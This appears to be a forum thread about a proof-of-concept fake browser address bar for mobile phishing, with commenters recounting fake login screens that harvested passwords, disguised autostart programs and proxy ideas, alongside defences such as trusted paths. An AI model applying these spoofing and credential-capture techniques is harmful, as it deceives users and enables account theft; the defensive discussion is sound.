This specific example may be new, but the concept of fooling users with websites containing images of the system's own UI is not new --- for example, all the fake antivirus alert boxes. That had a relatively easy mitigation --- using non-default appearance on your system (e.g. an XP-style "you have a virus!" dialog box image would just look silly if you weren't using XP with the default theme), but it seems the trend toward un-customisability is just going to lead to this being even more easy to exploit.
Of course, mobile browsers hiding important information and being even more un-customisable makes this worse.
Well, even I, as the creator of the inception bar, found myself accidentally using it!
When reading a product's documentation that has screenshots explaining how to do something, I've also accidentally tried to manipulate them instead of the actual dialogs. I'm sure others here have had similar experiences too.
Older school even -- instead of logging out of (real hardware) terminal sessions, exec a program which prints `login: ` and disables keyboard interrupts.
Read peoples creds and store somewhere, then issue a 'wrong password' msg and exit, resulting in the real login message.
People will just assume they made a typo and continue as if nothing happened.
I've argued before for a genuine out-of-band independent display on machines which can only be written to by some very high privilege process.
Similarly, the iPhone X requires double-pressing the power button to complete a purchase using Face ID. Previously, with Touch ID, the authentication action itself was also sufficient to establish intent (placing the finger on the sensor). But with Face ID, any app could just pop up the purchase window and Face ID would see your face.
Incidentally, this is why Face ID is strictly worse than Touch ID in my opinion.
how is it worse? touch id’s serving as authentication and approval for payment was actually exploited as a scam. I don’t see how this could be done with face id.
That’s fair. I never encountered anything like that. In my experience Touch ID was faster, more reliable, and more versatile (e.g. able to be activated with the phone lying on a table without peering over it with my face).
I happen to be in a situation where I have a phone with Face ID and one with Touch ID.
Touch ID with wet or slightly dirty fingers are not good. I've been doing some gardening over Easter and Touch ID is barely working because my fingers are more rough than they normally are.
Face ID on the other hand, works just as expected. It doesn't work optimally if I'm lying down, but that's not a problem for me personally.
Maybe is up to implementation? I've got an X and the intent to pay pops up the native pay modal, which still requires you to double press the power button AND to be authenticated. So what you say never really happens.
Yes, but it isn't very effective because if the computer is left with the login screen visible after Ctrl+alt+del opened in a full screen browser, users will simply proceed directly to typing their credentials. Then an endless logging in dialog could be presented, so that the user thinks it is a problem with the computer.
Hmm not if your users are trained to press Ctrl-Alt-Del again... The login screen would also allow them to order the OS to log off the current session too.
Mine would log you in. Of course the OS (Oasis) had a way to exec the login program and feed it the password. I stole the teacher’s password and then changed it.
He busted me by booting up the system from floppy and typed in the commend to format the hard drive and waited for me to return to the lab after school. I asked him what he was doing and he said he had no choice but to reinstall from scratch because someone changed the password. He then moved to hit the Enter key.
Not wanting my fellow students to lose their projects, I confessed. I logged him in and he changed the password.
He then gave my account admin privileges. I guess I had earned them.
I became the help desk. It seemed like an elevated status but in reality it meant I got some of the drudgery piled on to me. Password changes, adding students,
disk quota increases and such.
Back in the day I made a near-perfect copy of the RM (UK school IT supplier) login page in Visual Basic 6, and had it run on computers with RunServices registry entry. Had a team of mates with custom floppy disks going around installing it on as many PCs as we could. It would log the supplied user/pw to disk, then display the "wrong password" error, then quit, then exposing the real login screen.
What did you do with the passwords you captured? Sounds unethical... You'd definitely be facing criminal charges if you got caught doing this today I'd imagine.
Heh, I don't think so. Teachers don't like to send their pupils to court for silly things. They'd just get told why not to do it again and probably get some detention and stuff.
Yeah it's not like you did anything illicit like change grades or wreak havoc on the network by mass formatting computers, unless you intentionally left out those parts ;)
That exists: look for 'trusted path'. It was a feature of compartmented mode workstation (CMW) operating systems like Trusted Solaris and lives on in the requirement to use Ctrl-Alt-Del to call up the Windows login prompt. In Trusted Solaris (TSOL) it was a dedicated area of the screen—along the bottom—where no user mode process was allowed to write; the OS displayed a special symbol there (sort of like the padlock in a web browser) when the user was interacting directly with the OS. Some CMW systems even implemented that functionality in hardware, electronically compositing windows from different physical frame buffers to the video display. Ctrl-Alt-Del is actually in hardware, too (or it used to be); the keyboard interface on the first IBM PC detected that specific key combination and toggled the reset line on the CPU (or maybe it was an interrupt; I forget). Every subsequent PC-compatible machine, to this day, has the same functionality built in to the hardware, on the A20 reset line. It's mostly vestigial today.
This was how I gained full sysadmin access to our college's VAX 11/780 mini computer in late 1986. This machine ran pretty much everything from accounting to exam marking. There were three terminals that the admins would logon to pretty much regularly on the "student" side of the computer room. I knocked up a script to run on these three terminals that looked exactly like the standard login and mailed me the credentials entered before displaying the standard "incorrect username/password" (and then silently logoff). The risk for me, had the IT team been a bit more up on their game, was spotting my account being logged into these three terminals for long periods of time with me no-where to be seen :)
I kept silent about this until years afterwards for fear of being chucked out of college, which to be honest would've been a good thing seeing as the course was a waste of time.
What did you do with the passwords you captured? Sounds unethical... You'd definitely be facing criminal charges if you got caught doing this today I'd imagine.
Back in the days (1990) I found amusing to edit the autoexec.bat on my first CS session and add « You have a virus... of the flu », and signed with my pseudo.
Made me and my friend laugh.
Next session the teacher ask us to sit at the same computer, and after 20mn a guy come to me and ask « Are you pseudo ? »
Turns out that the computers really had viruses and they thought it was me !
They threatened to expel me (more to frighten me I think since they had no proof), and made me the cleaning guy for all the semester.
It gave me an undeserved reputation of the guy who hacked the university computers. And a better sense of caution.
In 1990 I also edited a friend's autoexec.bat to launch a quick basic script that would falsely check the disk for viruses and then prompt the user to delete their entire hard disk. Of course pressing "n" would print "y" on the screen and then display a fake progress bar along with a warning to not interrupt the operation in order to avoid disk damage.
I definitely had too much free time at the times. :)
In high school I replicated the entire login UI of NT LAN manager (I think it was called) and had it save the password and then crash the machine (via c:\con\con). Asked the teacher to login for something and tada, admin password.
If you ever wondered why you have to press ctrl-alt-del to log in, that is why (nobody ever fixed this for Linux).
It doesn't look like the implementation is any good though. First, you have to set it up manually. I've literally never seen anyone do that. Second, it works by killing X. Not exactly elegant. But most importantly you don't have to use the SAK to log in! That's kind of the whole point of it.
It should be "Press ctrl-alt-delete to log in", not "By the way you can press ctrl-alt-delete if you want" because then nobody will bother!
> Second, it works by killing X. Not exactly elegant.
It works by killing everything on that particular terminal, no matter if it's text based or graphical. That's the whole point: whatever spawns after that is created by the init system.
> But most importantly you don't have to use the SAK to log in! That's kind of the whole point of it.
> It should be "Press ctrl-alt-delete to log in", not "By the way you can press ctrl-alt-delete if you want" because then nobody will bother!
I can guarantee you, if I were to copy the design of the login screen that shows up after you press ctrl-alt+del, 99.999% of people who don't work in IT won't bat an eye and enter their credentials straight away. It comes down to educating your users. If you don't explain your users why they have to press it before logging in, they will write it off as just random computer stuff they don't understand and only do so because they get prompted to do so. If next time around they don't, they don't care.
So it comes down to educating your users, and I could very well train them to press alt-print-k before logging in, whereas I agree that a friendly reminder on the login screen is a plus.
In office, adding screenshot visual studio startup splash screen to the wallpaper and watch the dev. Best moment is when they see visual studio being first thing to start after system reboot.
The company where I first worked out of university had a custom which the CEO named ‘shemaling’. The company had quite strict security standards. It was encouraged that anyone who found an unlocked screen in the office would ‘shemale’ the wallpaper. It did the job. I never forgot again after being ’shemaled’ the first time.
I gay porned an entire company's computers after they refused to crack down on employees watching people being murdered all day. They threatened to fire me so I explained exactly why I had done this and that I would happily explain this at length in any subsequent employment tribunal. I kept my job and the management finally told everyone to stop watching people getting killed on company time.
My co-workers thought it hilarious to line up clips of people being run over by trains or having their throat cut, then tell unsuspecting people that they had something very important to show them. Management didn't like being bothered by people complaining about what they viewed as guys being guys. Until they got an eyeful of guys doing guys, that is.
At a previous job, we had a "pipi" mailing list (pee, in French), where people would send "I went to pee" from unlocked computers. The "victim" themselves would often be members of said mailing list. That worked quite well, so organically, the list ended up being used mainly for random jokes, news and stuff, rather than the "I went to pee" messages.
Funnily enough, it was four years ago, somewhere in continental Europe. Things were a bit freer there. I didn't stay there long. I have a lot more interesting stories from that place.
That's the era as me (Windows 3.0 was released in 1990, 3.1 a couple of years later). I'm surprised your school let you have unfettered access to the DOS prompt - that would have gotten abused within minutes at our school. Even the BBC BASIC interpreter ended up getting removed from the network because people like myself would abuse the PC Speaker (which, to be honest, was the last the mischief I'd cause).
Frankly though, I preferred the actual BBC Micros and Amiga's that those IBMs were meant to replace.
Someone I know would constantly leave a macbook unlocked, so I prepared a script that would turn down the volume, whisper the owner's name, open weird sfw pictures online and other mildly annoying things, but not very often (like once a week).
This was meant as a joke, and I never actually went through with it. I know the person very well but it still felt douchebaggy. But the idea was to make an app file, save it to some seemingly legitimate folder, and adding it to the autostart list.
The trick to hide the thing was to drag and drop Safari's logo onto it, and naming the app "Safan": it almost goes unnoticed when checking the Activity Monitor, thanks to the system font's proportions.
Blurred lines aside, for posterity you could name it "Safari Auto-Update Utility" and use an app icon that has the Safari logo coupled with a cog wheel or so.
I thought of something like that, but then the user could kill it as a precaution since an auto-update utility or any other secondary application can be temporarily disabled. Killing "Safari", on the other hand, would terminate everything the user's currently doing in it.
I guess I could have named it Disk Memory Manager or some other important-sounding thing.
I have an unquantified theory that the number of users that can distinguish between a Windows 7/8/10 dialog box that is presented directly by the operating system, versus as an image inside a browser coming from external http/https server, is diminishing greatly every year.
Last time I was in Davis CA, someone was trying to get me to sign up to their charity. They had an iPad, and were adamant that the padlock on the screen proved it was secure.
I couldn’t convince them that it was just a picture, and that I could fake it if I wanted to.
Which have a lower overall usage of the proprietary chrome browser, as well.
Firefox is the pre-install default for most distros, and only Chromium is provided in default repos.
They're also significantly more likely to use some form of ad and JS blocking.
So until the appearance changes based on the UA and system theme (and maybe can read bookmarks and plugins), this trick mostly affects mobile Chrome users.
Prolly need some sort of ml to parse every image used on device and tag potentially dangerous ones. Wouldn’t be too expensive on devices with tensor units...
Apparently Apple already reports your offensive photos already, can’t imagine why browsing should be treated differently.
>> This analysis generally happens inside a sandbox, and very little of what the systems determine makes it outside of that sandbox. There are special exceptions, of course, for things like child pornography, for which very special classifiers have been created and which are specifically permitted to reach outside that sandbox.
Unsure what is Techcrunch's source for this but it kinda makes sense.
With a little polishing this would be quite the "exploit" - trap the user in your fake browser, actually load pages that are entered into the fake URL bar, replace content only on certain patterns...
The only solution here is a proper line of death [0]. It defeats the purpose of the LoD when it dynamically shrinks from user action.
Fun fact, subway systems have been using this concept for decades.
Joking aside, "line of death" is easily understood but I never heard the name before. Now that it has a (perfect) name I will never forget it, and that's the importance of giving technology a fitting name. My biggest pet peeve in modern UI is the hamburger menu icon. Three horizontal lines does not, in any way, indicate to the user that menu options lay behind it... and the name was downright awful. We replaced a perfect icon at the time, the "gear" (a gear references an engine, so users looking to change settings understood the analogy). But the hamburger menu tried to remove the "settings" idea and instead encompass navigation, settings, preferences, and operations into one menu icon. In my opinion, it failed, but now is so ubiquitous most people are fine with it.
The hamburger is actually a simplification of the original icon, which actually looked like a pop-up menu, and I think is why it was acceptable for most people during the transition period.
The challenge is preserving ability for content to control all pixels; without it, the content ecosystem ends up developing single-purpose, generally crappy apps, which isn't necessarily a better thing either...
I'm not sure it is the only solution either - what about "secure attention key" type ways to get the system's attention (in this case the browser's), bypassing any content interception? For example, what if there was a key combo guaranteed to always bring in the browser UI, and typing that key combo was necessary before inputting any password field?
Alternatively, the reliance on browser password management could provide some security if it can be trusted to always work...
Those are some good ideas too - "only solution" was a bit hyperbolic - but I do think our options are limited, especially on mobile.
The Secure Attention Key is interesting, but would need the user to know you press it. And on mobile, it would probably need to be a dedicated button on the device, since I could just fake the on screen keyboard too.
Password manager auto-fill failing would clue a savvy user that something was wrong, but I suspect many would just assume it's a glitch and manually enter their credentials.
I saw an reply in another thread suggesting customizable browser background images for the UI bar, which a website would have no way of replicating. In my opinion that's probably the best approach, although it might mean throwing away the ability for sites to set the background color of the UI to match their theme (arguably losing nothing of value :).
With the use of gesture controls and swipe-up menus and "soft keys", etc, why not put in something like the "pie control" apps on Android, where the OS controls one part and the app controls another?
Consider a semi-configurable universal menu with a well defined access method, where you always can back out of the app, and in the case of browsers also have guaranteed access to switching tabs and accessing options, etc.
This gives me an idea... Even in fullscreen, I believe hovering the mouse near the top of the screen will also bring back some controls into view, but temporarily... So there's already some kind of "peek mode" for the controls... Entering this mode while typing a password in a standard password input field might make sense!
In Chrome beta 74, the count is in the bottom toolbar, so a variant of this attack that were UA-aware might have an even easier time. (The padlock is no longer green, either, and the leading https:// is omitted.)
On the other hand, scrolling to the very top of the page reveals the original address bar.
A possible mitigation would be to use a custom background or gradient for the bar that a web page can't guess. I'd be tempted to suggest the Google account's picture (if Chrome is logged in), but I don't know how safe that is from cross-site shenanigans.
I can't help but think that this was made possible by the complete collapse in common UI standards. 'Apps' have stopped being OS-toolkit apps and moved onto the web, and of course each designer needs to have their own special on-brand widget style. This has leaked onto the few remaining desktop apps: Chrome rejects the standard Mac OS widgets and reimplements everything, from buttons to the print dialog. Spotify does its own thing. And lest we think Apple has much respect for UX, iTunes is a mess. I genuinely can't use it.
The result is that users have been trained not to expect consistent UI paradigms. Every UI is hunt-and-peck. And that paves the way for this kind of exploit.
I don’t see what relation this rant has to the op. Surely the issue here is nothing to do with the ui displayed and more to do with the fact that it is possible to fake the browser ui. Even if chrome were using traditional controls on a desktop, one could imagine an exploit where clicking a malicious link puts the browser in full screen mode (most browsers only accept being put in full screen mode from event handlers for user interactions like clicking), and displays a fake browser ui inside.
This was anticipated and partly avoided by a reasonably large modal which pops up to tell you you’re in full screen mode, and disappears after a few seconds.
Another similar exploit on desktop was to set the cursor of the page to be a very large image which would overlay the browser chrome and put some fake information there.
The issue on mobile could perhaps be reduced by having some amount of ui that doesn’t go away (safari does this in portrait mode). Another help could be to not make the ui disappear (or make it reappear) when this kind of scrolling an iframe situation arises
Um, what? Standardization of UI is what makes this type of thing feasible large-scale, not the collapse of standardization.
Even just in this case - making it look like Chrome mobile results in a different bar than Firefox mobile. If they converge more though it'd take less effort to hit more people.
> 'Apps' have stopped being OS-toolkit apps and moved onto the web, and of course each designer needs to have their own special on-brand widget style.
Which is also why they are so abombinally large. Picking on Skype, but they are by no means the only or worst, the Android app is 71MB. There is no sane reason it needs to be that large except for all of the custom assets and custom widgets.
Using Firefox for android: if I open the page and scroll down, the address bar becomes invisible and the hsbc bar shows up. If I keep scrolling down, I just see hsbc. The moment I scroll up, the original address bar is shown, and even if I keep scrolling down, the bar does not disappear.
Edit: it's happening kind of randomly. 1 time it happens, 3 times it doesn't...
Using Firefox Beta for Android v67.0b9, I see the hbsc address bar as a second address bar below the real one. It remains in place as I scroll, although a couple of times it disappeared.
Also this version wouldn't fool me because it says I have 26 tabs open. I'm used to the infinity symbol there!
Using Firefox 66.0.2 on Android as well. Pretty much the same behavior here, except that it does not look random at all:
- at the top of the page, if I scroll, the address bar disappears;
- as soon as the fake HSBC bar appears, the real address bar comes back;
- both of them remain here until I reload the page.
It looks like if the use of CSS position: fixed forced the Firefox address bar to be visible. Which given the context looks like a really good thing!
If Firefox doesn't trust elements with position: fixed, one could use position: absolute or even position: static (the default value) instead and move element when scrolling.
Back in the day you used to be able to get people to click a series of sharing dialogs with fake iframe overlays. People were abusing it to get insanely viral posts shared by millions.
This worked brilliantly on my Chime Android, and I'm quite surprised the scroll-jail trick worked too.
I suppose the author just wanted a quick PoC, but with enough work, one could mimic an interactive browser address bar, including the menu that with refresh, bookmark, etc and even the HTTPS padlock with security information. Browser UIs being designed in CSS itself, one could easily copy/paste from the browser itself.
That’s because the site messes with the scrolling in an attempt to prevent the top chrome to not come back, which unfortunately (or fortunately?) doesn’t do anything because Safari refuses to hide it.
Yeah, the scrolling is so janky on the page, I thought my iPad wasn’t properly responding to multitouch input for a moment... Then I opened the HN discussion and smooth, buttery scrolling (tm) was back. Lesson: don’t hijack scrolling behavior, it’s awful. (Very smart hack though.)
> With a little more effort, the page could detect which browser it’s in, and forge an inception bar for that browser.
It’s just a proof of concept, focusing on one browser in one operating system. It would be interesting to see how well this could be done on iOS. The real host name is always shown at the top of the page, so it’s not going to be perfect.
Interesting! So it does. However Firefox does hide the URL bar on other pages! I'll try to figure out what the logic is in Firefox, and whether there's an equivalent trick to hide the URL bar ...
Just to be clear, you're referring to real Firefox address bar (pointing to TFA), not the fake Chrome address bar (pointing to hsbc.com). So yes, in this case Firefox has (accidentally?) somewhat thwarted this attack vector.
I noticed this as well. I'm wondering if FF is smart enough to always show it's own title bar if a CSS element is pinned to the top of the viewport? Gotta do more testing ...
Safari doesn’t hide the url bar when you employ the “scroll jail” technique he described. It also doesn’t feel right scrolling because he omitted the css property for inertial scrolling in his “scroll jail.”
Whenever I’m looking at an iPhone screenshot someone posted on social media on my iPhone, I try to navigate using the buttons in the image. There ought to be a long German word for that experience.
Yahoo actually tried to do this in 2015 with an internal initiative called “Silver Search” to try and trick Firefox users into using their own yahoo-powered omnibux. I was fucking livid when I found out about it and complained.
I'm not doubting the concerns raised but the fake failed in many ways for me on my phone with the latest chrome. It didn't appear. Then when it did it appeared below the existing bar.
But I guess you just need it to work often enough.
It's like the fake "Allow Notification" dialogs on some sites. They look off to pretty much anyone paying attention, but their target market probably isn't people paying attention
It can be more sinister. Although I am sure the other answers are right in some circumstances, I was curious a while ago, so I actually clicked one.
Whether you click allow or deny, it shot off a network request to a third party domain. This lets the third party know your browser's user agent, and if they have an exploit for your browser they will send a payload that compromises the browser with the intent of installing an adware extension.
It failed to install on the machine I made for it (Ubuntu18/Chrome) but it did manage to navigate me to an advert from the click.
It’s the same reason many iPhone apps implement their own dialogues to ask about allowing notifications. If the user chooses ‘Deny’ in the system-provided one, the app can never ask again and the only way to turn notifications on later is to have the user go digging around in the Settings app, which few people will bother to do.
I take great pleasure in choosing ‘Allow’ in those custom dialogues and then ‘Deny’ when the native one pops up immediately afterwards.
FYI this isn’t occurring on chrome or safari on iOS. As soon as the fake bar appears the page stops scrolling normally - the scrolling inertia stops so that I can scroll but not “toss” the page, and the real address bar no longer hides. I wonder if this is a deliberate mitigation, or an accident?
I understand why this was a problem in 1995, but honestly, in 2019, with image recognition technology as advanced as it is now – especially due to efforts by Google – why can't browsers detect this? Surely "does this rectangle look vaguely like a URL bar" is an easier problem to solve than "is this a photograph of a cat"?
Sure, image recognition is CPU intensive, but even just checking once every 5 seconds or so would be enough to prevent this sort of attack and pop up a big "you are being phished" warning. And 99.99% of what occupies that UI real estate looks sufficiently unlike a search bar that a low-cost recognizer should be able to rule out phishing for normal sites fairly quickly.
What am I missing? Has this approach been tried and rejected? Is image recognition of fairly static, flat, 2D, geometric shapes actually far more CPU-intensive than I imagine?
MobileSafari has an interesting feature that your idea reminded me of: it tries to detect when a site using the Fullscreen API presents an iOS keyboard-lookalike through the location and frequency of your taps on that side of the screen. I’ve gotten the warning when doing something else and was impressed they thought of it.
While this is true, it's usually referring to algorithmically chosen adversarial inputs. On the other hand, it's a lot harder to trick both the browser's image recognition and the human operator's visual senses with the same UI.
This is actually one of the core goals of adversarial machine learning: crafting inputs that trick a machine but look indestinguishable to a human [1].
Thanks, and yes! I was originally thinking "pull-to-refresh", but since your comment, I've enhanced the phishing with another trick: a large buffer at the top of the scroll jail, which prevents the user from reaching the top, and thus prevents the user from using "pull-to-refresh". Now, the only way I know to reliably get out of the page is to move to another app, then back to Chrome - this seems to cause it to re-display the true URL bar.
This is why I think removing the physical (as in, below the screen --- whether they're capacitive or actual pushbuttons isn't the point here) buttons from Android devices is a horrible idea; a webpage can mess around with what's on the screen, but it can't stop the user pressing the physical menu button and choosing Refresh from there.
By "hard refresh" I took that to mean using the keyboard to forcibly reload the page and all assets, e.g. CTRL-F5 on Windows. Of course, the average user probably doesn't use keyboard commands, or even know this one exists.
FWIW, opening that link in mobile Safari shows a large “X” in the top left of the screen and trying to scroll sets of the “it looks like you’re typing in fullscreeen” warning.
At least on my computer there is a permission dialog for the fullscreen API. However, if document scripting is disabled (which is what I have by default anyways) then the link does not do those stuff. (I also use an unusual window layout, so if someone tries to spoof the window layout, it is likely that I can easily see the problem immediately anyways.)
A recent example that I've been seeing more and more is pages taking over some system keyboard shortcuts. I've seen pages taking over Command-F and using their own search interface instead of the browsers. I've found utilities for not messing with copy/paste, but is there a way to block pages with keyboard shortcuts in Chrome?
I recently helped someone install vlc. I googled VLC download (relying on Google) and then clicked through the clearly labelled download links. I accidentally must have clicked a link twice because two copies started downloading. The more recent one was finished so I literally started opening the executable. The only thing that stopped me was that it was called vlc-streaming or something, and the one next to it was still downloading, slowly.
That's because it was a download triggered by vlc's ad partner. It wasn't VLC.
This wasn't some shady part of the Internet. I was livid.
If they had given it the same name, size, and approximate download speed as the file I was downloading, I would have had zero way to determine this. Everyone has accidentally started two downloads when they just wanted one copy.
Unreal that this could happen on an official site. (And that it basically tricked me.)
I’m convinced to use windows store or Choco to install stuff for this reason. Paint.net is practically impossible to download from their as infested site.
Slightly OT, but it's HTTPS so it must be safe, right ?
It's an example of why the "HTTPS everywhere" push annoys me, it gives false sense of security. Security resources should be better spent.
Also, back on topic, Google should stop handing blindly the wheel to "Designers". Oversimplification instead of properly educating people lead to this crap.
HTTPS everywhere is a good thing. HTTPS was never about protecting against phishing, and has never protected you against phishing. There is no way to educate people about phishing, only way to protect against it is U2F. Education against phishing is not very effective, and only works short term.
Exactly, and I disagree on education. People can and must be taught on security (not just phishing). But that also mean some standardization on the browser UI and not trying to make it "seamless" and "transparent". This exploit is the result of voluntarily blurring the lines between Traditional Apps and Web Apps. Well, the threat model being very different, it's not a good idea.
HTTPS is a part of a whole and pushing so hard make people (even tech savvy ones) focus too much on it. How many CTOs are happy with just putting HTTPS on their website so they can check the security checkbox ?
Which is arguably why the push is increasingly to "Not Secure" and "Is Maybe Secure" notifications over "Is Secure". Maybe that will help more end users.
This fake bar reminds me of a fake address bar that Google displays in an AMP viewer and efforts it takes to be able to replace URLs in an address bar instead of just letting the user visit the target site.
Another example where Chrome prefers usability over security is autofill, where a user can accidentally share more personal information than he/she wishes:
I figured out something kinda like this but worse. I don't really know how to make it public though because it hits so many different pieces of software that I struggle to see how I could give enough warning to all of them. Thousands of entities, really.
If someone else has dealt with this please reach out I want to make it public in a safe way.
I'll worry about this when I stop getting emails from my banks and credit card companies that look like cheesy phishing emails and ask me to click the link then login.
My point is that none of this stuff matters if major corporations continue to send out terrible emails that basically encourage consumers to engage in risky behavior.
Reading this reminded me of the time in the 80s when I discovered hex editors and changed COMMAND.COM to reverse every DOS command. So to get a directory listing you had to type RID, COPY became YPOC, etc. The error message was !sdrawkcaB. I know I'm no hacker but everyone else thought I was.
Perhaps a solution would be to allow the browser to share a "fingerprint" with specific websites. To make a trusted connection. The website would know if a trusted connection exists for the user and deny all login attempts coming from unauthorized fingerprints.
IMO, the collapsed address bar is the most pragmatic fix to this issue. (The other fixes are options that users would have to opt in to, rather than being fixed at the source - i.e. Chrome.)
I tried to exploit the mobile browser hiding the address bar when scrolling to hide the address bar in a web game/app to get more screen real estate on mobile but most browsers make it very hard.
The illusion is almost perfect. However, it breaks when you scroll back to the very top. The real address bar reappears on top amd stays there even when scrolling back down. This is with Chrome 73.
I written in quick basic clone of novell network login screen and dumped passwords to a file.
Got dozens of students passwords and did nothing with it...
I was 13 years old...
In principle, it's not a mitigation - I was just too lazy to forge an interactive URL bar! You could make one which acts just like the Chrome URL bar, but e.g. acts as a MITM.
At first I though you wouldn't be able to stay "in the middle" because you'd have to redirect to the typed address. You can't AJAX it in, because of CORS.
But you could go to your own host and have your server sit in the middle. The user wouldn't be logged in, since cookies wouldn't be sent. But maybe they would login through your proxy.
Yuck. I have a custom UI on mobile so it's out of place to see white.
I also just suffered from a bug causing images to half load (no idea why it seems new).
In trying to get images to load I got the tab count portion loaded, I then immediately tried changing tabs ... With the fake button I just made show up.
I found a fix to this problem, on accident.
I use Blokada apk on android (not the Google play store version, the good one, if that makes a difference) and when first visiting the page didn't see what the hell you were talking about, the inception url bar never showed up for me. So, when most things don't load or don't act as they're supposed to that is the first thing I go and do-- disable Blokada and reload. Once I did, then it showed up, (pretty cool little discovery btw, good job)
The article indicates it's not supposed to. It's a quick and dirty proof of concept, working in one environment (Android/Chrome), with a screenshotted fake header. Just enough to prove the point.
Safari has prevented websites from accessing nonstandard fonts as an anti-fingerprinting technique for a while now, so this script does not quite work for those.
Security vulnerabilities are discovered across all platforms. Just recently did we find an eavesdropping vulnerability in iOS[0] that certainly qualifies as far more severe. Given how security issues can pop up for any platform, I don't think calling one group of users "poor" is prudent, or a nice thing to do.
I guess this risk could be mitigated if the browser had recognition code running in the background for if the top of the screen was mimicking the search bar. I'm not fond of the idea that we put restrictions of fullscreen mode where it requires user approval when scrolling down or something of that sort.
Reading these comments initially got me sad. How many echoes of the article’s theme - ‘look at this flaw and how I exploited it’. At first I thought the author had cast a magical spell to bring out the dark side in us. But really, The initiative in us that is adversarial already exists and is simply suppressed. We go about all day acting ‘civilized’ while the animal in us paces nervously waiting for an opportunity to get out. And in the anonymity of the net, we let the animal out. How many of us would brag about these accomplishments to our children or to our boss at work?
But then I realized how honest every post was. How anonymity also encouraged ‘free’ speech. And remarkably how much data was shared. Before the net, when we couldn’t be anonymous, we couched our meanings in bs and obfuscation. The ‘bs’ meter was a finely tuned process that you had to develop and run in the background to sort the chaff from a person’s words. Now, comments are often accompanied by a github link where I can read and test the code that people brag about. Thank you internet
This specific example may be new, but the concept of fooling users with websites containing images of the system's own UI is not new --- for example, all the fake antivirus alert boxes. That had a relatively easy mitigation --- using non-default appearance on your system (e.g. an XP-style "you have a virus!" dialog box image would just look silly if you weren't using XP with the default theme), but it seems the trend toward un-customisability is just going to lead to this being even more easy to exploit.
Of course, mobile browsers hiding important information and being even more un-customisable makes this worse.
Well, even I, as the creator of the inception bar, found myself accidentally using it!
When reading a product's documentation that has screenshots explaining how to do something, I've also accidentally tried to manipulate them instead of the actual dialogs. I'm sure others here have had similar experiences too.